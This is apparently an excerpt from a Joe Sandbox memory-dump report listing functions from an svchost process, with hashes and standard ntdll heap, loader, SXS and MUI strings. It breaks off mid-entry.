                                                                                            • Opcode ID: 1652e4432f2c0496356dadf8ffb7b026805bff45b8f574c6c23ca6c1a6cad84f
                                                                                            • Instruction ID: 01e6c9f6e19bbd619502a61e8576617ae89d1b05af0218fea09a585f921164e4
                                                                                            • Opcode Fuzzy Hash: 1652e4432f2c0496356dadf8ffb7b026805bff45b8f574c6c23ca6c1a6cad84f
                                                                                            • Instruction Fuzzy Hash: 89D1D572814395AFD721DB64C980BAFB7ECAF84714F04492FFA949B290E774C948C792
                                                                                            Function 03AE0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                            • API String ID: 0-1700792311
                                                                                            • Opcode ID: 83c3be018435cb1eab360c79bcaf07fc1a8cc66b953b8cf48365224eb40140fc
                                                                                            • Instruction ID: 9e6f718e18ef580b00d92a16e974ea74100a23be4c80770890ca8b7f1d77a26f
                                                                                            • Opcode Fuzzy Hash: 83c3be018435cb1eab360c79bcaf07fc1a8cc66b953b8cf48365224eb40140fc
                                                                                            • Instruction Fuzzy Hash: 1ED1CC35500685EFCB26EF6AC540AAEFBF1FF5A704F08814AE4559B762C7B89941CB20
                                                                                            Function 03A2D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • @, xrefs: 03A2D0FD
                                                                                            • @, xrefs: 03A2D313
                                                                                            • @, xrefs: 03A2D2AF
                                                                                            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 03A2D0CF
                                                                                            • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 03A2D262
                                                                                            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 03A2D146
                                                                                            • Control Panel\Desktop\LanguageConfiguration, xrefs: 03A2D196
                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 03A2D2C3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                            • API String ID: 0-1356375266
                                                                                            • Opcode ID: a53b2ce46afe2029fd3e0496936f941aec567b482aeede95d32d6e795c25d485
                                                                                            • Instruction ID: af6a3e45794e8b79c273eaf285537dba7fd3ca2d260ec09f6c71290b060196fe
                                                                                            • Opcode Fuzzy Hash: a53b2ce46afe2029fd3e0496936f941aec567b482aeede95d32d6e795c25d485
                                                                                            • Instruction Fuzzy Hash: 46A16A719083559FD721DF28C984B5BBBE8BB84715F004D2FF9A89A241E774D908CF92
                                                                                            Function 03A3ADE0 Relevance: 9.3, Strings: 7, Instructions: 573COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
                                                                                            • API String ID: 0-664215390
                                                                                            • Opcode ID: cf74fb4dcc7e045557643824e69456ba336b30ba71bfbc8de4ad1d71cf45dec3
                                                                                            • Instruction ID: 42a0e699015464ab06b8260121f379c540bda2dfad14169db5dd8275e8af3a19
                                                                                            • Opcode Fuzzy Hash: cf74fb4dcc7e045557643824e69456ba336b30ba71bfbc8de4ad1d71cf45dec3
                                                                                            • Instruction Fuzzy Hash: D032B175E04269CFEF25CB14C894BEEB7BAAF46340F1841EBE449A7290D7719E818F50
                                                                                            Function 03A49EB0 Relevance: 9.2, Strings: 7, Instructions: 499COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • @, xrefs: 03A49EE7
                                                                                            • minkernel\ntdll\sxsisol.cpp, xrefs: 03A97713, 03A978A4
                                                                                            • Status != STATUS_NOT_FOUND, xrefs: 03A9789A
                                                                                            • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 03A976EE
                                                                                            • Internal error check failed, xrefs: 03A97718, 03A978A9
                                                                                            • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03A97709
                                                                                            • sxsisol_SearchActCtxForDllName, xrefs: 03A976DD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                            • API String ID: 0-761764676
                                                                                            • Opcode ID: c29e3fabf5cd050da0e0e49ba120c2a177e52bc2fe0181c03362212982bcfc9d
                                                                                            • Instruction ID: 8bb8fa584887a8244383dd2dc6b3bf1e58374753a0c2d42032729b1f74172e33
                                                                                            • Opcode Fuzzy Hash: c29e3fabf5cd050da0e0e49ba120c2a177e52bc2fe0181c03362212982bcfc9d
                                                                                            • Instruction Fuzzy Hash: BC127E74A002259FEF24CF58C881AAEB7F4FF89714F1884ABE845EB351E7359851CB64
                                                                                            Function 03A3EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                            • API String ID: 0-1109411897
                                                                                            • Opcode ID: bf434be5520fb9ab46d5021b9a85015def67e22f0c38b560d7709f0e13be9f2b
                                                                                            • Instruction ID: 4f9bc63339380d25002105fc4fc8d784829f6e2765a09016fd8d8e1ed9b2046a
                                                                                            • Opcode Fuzzy Hash: bf434be5520fb9ab46d5021b9a85015def67e22f0c38b560d7709f0e13be9f2b
                                                                                            • Instruction Fuzzy Hash: 6FA22A75E056298FDF64DF19CD88BA9B7B5AF4A304F1442EBE809A7250DB349E81CF40
                                                                                            Function 03A2F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                            • API String ID: 0-523794902
                                                                                            • Opcode ID: 16c4044031f5d8853c8f4f70e4662a210e4548c60b4a0dba66b783665b19f433
                                                                                            • Instruction ID: d7b6a3aed338b33dc7b3751e45d7c2ed532e8014a0644a1eecbbd35f2054a1e6
                                                                                            • Opcode Fuzzy Hash: 16c4044031f5d8853c8f4f70e4662a210e4548c60b4a0dba66b783665b19f433
                                                                                            • Instruction Fuzzy Hash: D242CC75608391DFC715EF28C984A2ABBF5FF89604F084A6FE8968B391D734D841CB52
                                                                                            Function 03A4B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                            • API String ID: 0-122214566
                                                                                            • Opcode ID: 7c0c5fecb97aff0ff6f48800748cf3a0e728a147769c3cceb80d62d223ef7d2e
                                                                                            • Instruction ID: 7495ef8efd58544266c5bc43d8eb5401155a8a98af24a1ddc3ce7af080772324
                                                                                            • Opcode Fuzzy Hash: 7c0c5fecb97aff0ff6f48800748cf3a0e728a147769c3cceb80d62d223ef7d2e
                                                                                            • Instruction Fuzzy Hash: F6C12B35A00215ABDF24CB69C880BBEB7B9AFD5310F18416FE845AF791E7B4D944C3A1
                                                                                            Function 03A663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                            • API String ID: 0-792281065
                                                                                            • Opcode ID: 734dff4960eda31b954d31bdc0b14f960f73679e7c349e9349c32ff42e6814ff
                                                                                            • Instruction ID: 85e0079dcac2be84fcc564ce788137faf3e53201d336056493d273d4c4c2c2fd
                                                                                            • Opcode Fuzzy Hash: 734dff4960eda31b954d31bdc0b14f960f73679e7c349e9349c32ff42e6814ff
                                                                                            • Instruction Fuzzy Hash: C6915836A00B149FDB34EF19DA48BAEB7B4FB55B18F08066FE8146B791D7B49801C790
                                                                                            Function 03A6C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 03AA81E5
                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 03AA8181, 03AA81F5
                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 03A6C6C3
                                                                                            • Loading import redirection DLL: '%wZ', xrefs: 03AA8170
                                                                                            • LdrpInitializeImportRedirection, xrefs: 03AA8177, 03AA81EB
                                                                                            • LdrpInitializeProcess, xrefs: 03A6C6C4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                            • API String ID: 0-475462383
                                                                                            • Opcode ID: 00b0c24b626c3f31de59535f5be230b379cf9ba889448194c91431231c13b874
                                                                                            • Instruction ID: 680eb332a7dee1985c71fd4fa187afdd8fdb8fa68a86f553cd3659e7cfe6deaa
                                                                                            • Opcode Fuzzy Hash: 00b0c24b626c3f31de59535f5be230b379cf9ba889448194c91431231c13b874
                                                                                            • Instruction Fuzzy Hash: 8331F77A644701AFC224EF2CDE45E2AB7A4EF84B24F04095AF8855B391D724EC04C7A2
                                                                                            Function 03AB9C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                            • API String ID: 0-3127649145
                                                                                            • Opcode ID: 3398d8dea2242e0086e6b4aeecfd57d2118ad879b6e1b9867c5e640d79389e08
                                                                                            • Instruction ID: 3206126e9fc6a719954f92e822b291ea42a7303bf0b96b2a9f26db4c3c63b0c3
                                                                                            • Opcode Fuzzy Hash: 3398d8dea2242e0086e6b4aeecfd57d2118ad879b6e1b9867c5e640d79389e08
                                                                                            • Instruction Fuzzy Hash: AE325675A007199BDB60DF25CD88BDAB7F8FF48300F1046EAE509AB251DB70AA84CF50
                                                                                            Function 03A49950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                            • API String ID: 0-3393094623
                                                                                            • Opcode ID: 33ae96f6f1ba073717aad32fb8344dc0e30a9e74e46f4e1ddd09baa487c9d5b6
                                                                                            • Instruction ID: f9b7b65b0dadf3073d1539f0a459caae53b5e913938f7574ea912c36683f73f8
                                                                                            • Opcode Fuzzy Hash: 33ae96f6f1ba073717aad32fb8344dc0e30a9e74e46f4e1ddd09baa487c9d5b6
                                                                                            • Instruction Fuzzy Hash: 0A0257719083418FD720CF64C184BABBBE5BFC9704F48892FE9999B250E770D855CBA2
                                                                                            Function 03A551EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • Kernel-MUI-Number-Allowed, xrefs: 03A55247
                                                                                            • WindowsExcludedProcs, xrefs: 03A5522A
                                                                                            • Kernel-MUI-Language-SKU, xrefs: 03A5542B
                                                                                            • Kernel-MUI-Language-Allowed, xrefs: 03A5527B
                                                                                            • Kernel-MUI-Language-Disallowed, xrefs: 03A55352
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                            • API String ID: 0-258546922
                                                                                            • Opcode ID: b0ce2ea30638340fdadfcbe1b97d5f839abe5b706f779510a39353db82819641
                                                                                            • Instruction ID: 8167ae1fbec74c7da047b3ce5bdb098d24b411ada9967fa97366f6c87b0d94de
                                                                                            • Opcode Fuzzy Hash: b0ce2ea30638340fdadfcbe1b97d5f839abe5b706f779510a39353db82819641
                                                                                            • Instruction Fuzzy Hash: 4AF13B76D00218EFCF15DF98D984AAEBBF9FF49650F15405BE902AB250D7749E01CBA0
                                                                                            Function 03AB4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                            • API String ID: 0-2518169356
                                                                                            • Opcode ID: 41d542eff2bd4030d099f69b2eb153f925089474e372be50fdf15d409c015334
                                                                                            • Instruction ID: 507e0aa0a03d4a5a1c344dde915725ba08941310cd5429f481a40428b6380a5b
                                                                                            • Opcode Fuzzy Hash: 41d542eff2bd4030d099f69b2eb153f925089474e372be50fdf15d409c015334
                                                                                            • Instruction Fuzzy Hash: 6991BF76D006199FCB20CFA9C881AFEB7B8EF4A710F59416AE811EB352D735D901CB90
                                                                                            Function 03A5D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                            • API String ID: 0-1975516107
                                                                                            • Opcode ID: b38e976ea0c6e8cb0678a297fbe06a229d7379977adf3577e89304f1b9716c4e
                                                                                            • Instruction ID: 29bacc90396f13a2dd5c2222613d488ca9e0229281b992e807e20ee22a74675a
                                                                                            • Opcode Fuzzy Hash: b38e976ea0c6e8cb0678a297fbe06a229d7379977adf3577e89304f1b9716c4e
                                                                                            • Instruction Fuzzy Hash: 6A51EE75A00345DFDB24EFA8C68479DFBB1BF49318F28425BE8056B6A5D774A881CB80
                                                                                            Function 03A276B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                            • API String ID: 0-3061284088
                                                                                            • Opcode ID: 0e107cebf052e6cfb8a99e752ad672cb97568d2f69a4711ed8f6069d5db4ce08
                                                                                            • Instruction ID: 7ec83e9d1a2cd6e4eb0ffcfb69d5360722ebd41f449ce80cfa2d314a7c9a3658
                                                                                            • Opcode Fuzzy Hash: 0e107cebf052e6cfb8a99e752ad672cb97568d2f69a4711ed8f6069d5db4ce08
                                                                                            • Instruction Fuzzy Hash: 8A01D876148660EFD22AF71DE519F96BBE4EB42B70F18405BE0104BAA2CBA59C84D570
                                                                                            Function 03A470C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                            • API String ID: 0-3178619729
                                                                                            • Opcode ID: 5a5605a92d66b8095c5b4ddb10633a8a5322f00d3f0709557a2cc598600acad1
                                                                                            • Instruction ID: 5c720f475052159e6a3f4be9f1f10e72eb7c28b4cfc0f7f7fac978905813a9a4
                                                                                            • Opcode Fuzzy Hash: 5a5605a92d66b8095c5b4ddb10633a8a5322f00d3f0709557a2cc598600acad1
                                                                                            • Instruction Fuzzy Hash: 69139D70A00655DFDB25CF68C4807A9FBF5BF89304F1881AED859AB381D73AA945CF90
                                                                                            Function 03A41070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                            • API String ID: 0-3570731704
                                                                                            • Opcode ID: 1cb36fba9d1f4bec82de3208c3d52f0a6281a7d16f338364539868be9ace5bb4
                                                                                            • Instruction ID: 6cafc36fdc16cf96f1734caedb69ab4e6aab6f98a775d083496654a5038cbf6a
                                                                                            • Opcode Fuzzy Hash: 1cb36fba9d1f4bec82de3208c3d52f0a6281a7d16f338364539868be9ace5bb4
                                                                                            • Instruction Fuzzy Hash: 43923875E00228CFEB25CB18C981BA9B7B5BF85314F1981EBE949AB350D7349E80CF51
                                                                                            Function 03A4A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • SsHd, xrefs: 03A4A885
                                                                                            • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03A97D03
                                                                                            • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03A97D56
                                                                                            • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03A97D39
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                            • API String ID: 0-2905229100
                                                                                            • Opcode ID: d9367a8ffcf87c15cd14c72590af554d5416ad288f675ececd56713960db17fb
                                                                                            • Instruction ID: 9e213cd229c4ac4a1af075da0219763e25527fa065368dafa9c31d95ac12252d
                                                                                            • Opcode Fuzzy Hash: d9367a8ffcf87c15cd14c72590af554d5416ad288f675ececd56713960db17fb
                                                                                            • Instruction Fuzzy Hash: 93D17C76A402199BDF24CF98C9806ADF7B5FF88310F19416BE845AB352D371D951CBA0
                                                                                            Function 03A43D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                            • API String ID: 0-3178619729
                                                                                            • Opcode ID: b8d3ee56b7d18420d42213645f920625798aa944010edd581d22cdfdb8a55610
                                                                                            • Instruction ID: 022eb5a9025751643c2a21e450b86c452660aa0534101605dc41ab9c792221bf
                                                                                            • Opcode Fuzzy Hash: b8d3ee56b7d18420d42213645f920625798aa944010edd581d22cdfdb8a55610
                                                                                            • Instruction Fuzzy Hash: 28E29074A00655DFDB28CF69C490BA9FBF1FF89304F1881AED849AB385D735A845CB90
                                                                                            Function 03A3A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                            • API String ID: 0-379654539
                                                                                            • Opcode ID: 496e732f0d58218b9c070a2a63866c1cab30399565341ce71f91cef90a6f1142
                                                                                            • Instruction ID: 584432be85fe13b77e3d5cf4e764cb4d7bb944404988cc87f2b08d69c3087c2e
                                                                                            • Opcode Fuzzy Hash: 496e732f0d58218b9c070a2a63866c1cab30399565341ce71f91cef90a6f1142
                                                                                            • Instruction Fuzzy Hash: A8C177742083969FDB11CF28C144B6AB7F4AF86704F04896FF8D69B250E739C949CB56
                                                                                            Function 03A40C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • HEAP[%wZ]: , xrefs: 03A954D1, 03A95592
                                                                                            • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 03A955AE
                                                                                            • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 03A954ED
                                                                                            • HEAP: , xrefs: 03A954E0, 03A955A1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                            • API String ID: 0-1657114761
                                                                                            • Opcode ID: 006ef1e2a29b20a99e4d5047df1b0c5afa3263a40c3f72ea3193dff072ae5c7d
                                                                                            • Instruction ID: 4a064eaf1d898d18c847a18d04cc775828ad5146751f57b2763fb9dbc82507ee
                                                                                            • Opcode Fuzzy Hash: 006ef1e2a29b20a99e4d5047df1b0c5afa3263a40c3f72ea3193dff072ae5c7d
                                                                                            • Instruction Fuzzy Hash: CAA1E034A04205DFDB24DF28C845BBAFBF5AF95300F18866FD5968B782D734A844EB90
                                                                                            Function 03A6273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • .Local, xrefs: 03A628D8
                                                                                            • SXS: %s() passed the empty activation context, xrefs: 03AA21DE
                                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 03AA21D9, 03AA22B1
                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 03AA22B6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                            • API String ID: 0-1239276146
                                                                                            • Opcode ID: 89297d2bfd422c8abda2032f2ae83d2927a180f4034677c3a950d4331de27cbb
                                                                                            • Instruction ID: d00d9de2c67835240671e6311fa6dd06428eb94ea12ffee7cfe1f8a5815cedb7
